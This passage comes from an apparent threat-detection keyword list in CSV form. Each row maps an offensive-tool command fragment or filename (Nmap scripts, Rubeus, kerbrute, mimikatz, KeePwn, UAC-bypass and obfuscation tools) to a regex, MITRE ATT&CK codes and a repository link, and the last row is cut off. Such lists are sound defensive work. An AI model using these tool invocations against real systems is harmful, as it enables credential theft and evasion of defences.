broadcast-igmp-discovery.nse*",".{0,1000}\sbroadcast\-igmp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-jenkins-discover.nse*",".{0,1000}\sbroadcast\-jenkins\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-listener.nse*",".{0,1000}\sbroadcast\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-ms-sql-discover.nse*",".{0,1000}\sbroadcast\-ms\-sql\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-netbios-master-browser.nse*",".{0,1000}\sbroadcast\-netbios\-master\-browser\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-networker-discover.nse*",".{0,1000}\sbroadcast\-networker\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-novell-locate.nse*",".{0,1000}\sbroadcast\-novell\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-ospf2-discover.nse*",".{0,1000}\sbroadcast\-ospf2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-pc-anywhere.nse*",".{0,1000}\sbroadcast\-pc\-anywhere\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-pc-duo.nse*",".{0,1000}\sbroadcast\-pc\-duo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-pim-discovery.nse*",".{0,1000}\sbroadcast\-pim\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-ping.nse*",".{0,1000}\sbroadcast\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-pppoe-discover.nse*",".{0,1000}\sbroadcast\-pppoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-rip-discover.nse*",".{0,1000}\sbroadcast\-rip\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-ripng-discover.nse*",".{0,1000}\sbroadcast\-ripng\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-sonicwall-discover.nse*",".{0,1000}\sbroadcast\-sonicwall\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-sybase-asa-discover.nse*",".{0,1000}\sbroadcast\-sybase\-asa\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-tellstick-discover.nse*",".{0,1000}\sbroadcast\-tellstick\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-upnp-info.nse*",".{0,1000}\sbroadcast\-upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-versant-locate.nse*",".{0,1000}\sbroadcast\-versant\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-wake-on-lan.nse*",".{0,1000}\sbroadcast\-wake\-on\-lan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-wpad-discover.nse*",".{0,1000}\sbroadcast\-wpad\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-wsdd-discover.nse*",".{0,1000}\sbroadcast\-wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-xdmcp-discover.nse*",".{0,1000}\sbroadcast\-xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bropper.py*",".{0,1000}\sbropper\.py.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "* brute * /password*",".{0,1000}\sbrute\s.{0,1000}\s\/password.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* --bruteforce *.kdbx*",".{0,1000}\s\-\-bruteforce\s.{0,1000}\.kdbx.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "* BruteForce(*",".{0,1000}\sBruteForce\(.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "* --brute-ratel*",".{0,1000}\s\-\-brute\-ratel.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "* Brutesploit*",".{0,1000}\sBrutesploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","0","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "* bruteuser *",".{0,1000}\sbruteuser\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* bruteuser -d *",".{0,1000}\sbruteuser\s\-d\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* build Dent.go*",".{0,1000}\sbuild\sDent\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "* -Build -NoAttackPaths*",".{0,1000}\s\-Build\s\-NoAttackPaths.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "* build_letmeout*",".{0,1000}\sbuild_letmeout.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "* by @citronneur (v*",".{0,1000}\sby\s\@citronneur\s\(v.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* by @JoelGMSec *",".{0,1000}\sby\s\@JoelGMSec\s.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "* by erwan2212@gmail.com*",".{0,1000}\sby\serwan2212\@gmail\.com.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* BypassCredGuard.exe*",".{0,1000}\sBypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "* BypassFramework.py*",".{0,1000}\sBypassFramework\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "* 
BypassUac*.bat*",".{0,1000}\sBypassUac.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* BypassUac*.dll*",".{0,1000}\sBypassUac.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* BypassUac*.exe*",".{0,1000}\sBypassUac.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* -c ""!mimikatz"" *",".{0,1000}\s\-c\s\""!mimikatz\""\s.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "* -c * --choose-mutators * -s 1*",".{0,1000}\s\-c\s.{0,1000}\s\-\-choose\-mutators\s.{0,1000}\s\-s\s1.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "* -c * -o 
payload.ser*",".{0,1000}\s\-c\s.{0,1000}\s\-o\spayload\.ser.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "* -c * -s * -o share_listing -m 150*",".{0,1000}\s\-c\s.{0,1000}\s\-s\s.{0,1000}\s\-o\sshare_listing\s\-m\s150.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "* -c * -s * --proxy * --proxyu * --proxyp * --reconnect *",".{0,1000}\s\-c\s.{0,1000}\s\-s\s.{0,1000}\s\-\-proxy\s.{0,1000}\s\-\-proxyu\s.{0,1000}\s\-\-proxyp\s.{0,1000}\s\-\-reconnect\s.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "* -c *ExploitClass.cs*System.dll*",".{0,1000}\s\-c\s.{0,1000}ExploitClass\.cs.{0,1000}System\.dll.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -c *OBFUSCATION=*.ps1*",".{0,1000}\s\-c\s.{0,1000}OBFUSCATION\=.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* -c '/accepteula /s calc.exe' -e PsExec64.exe*",".{0,1000}\s\-c\s\'\/accepteula\s\/s\scalc\.exe\'\s\-e\sPsExec64\.exe.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","0","N/A","N/A","3","272","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "* -c active_users -u *",".{0,1000}\s\-c\sactive_users\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral 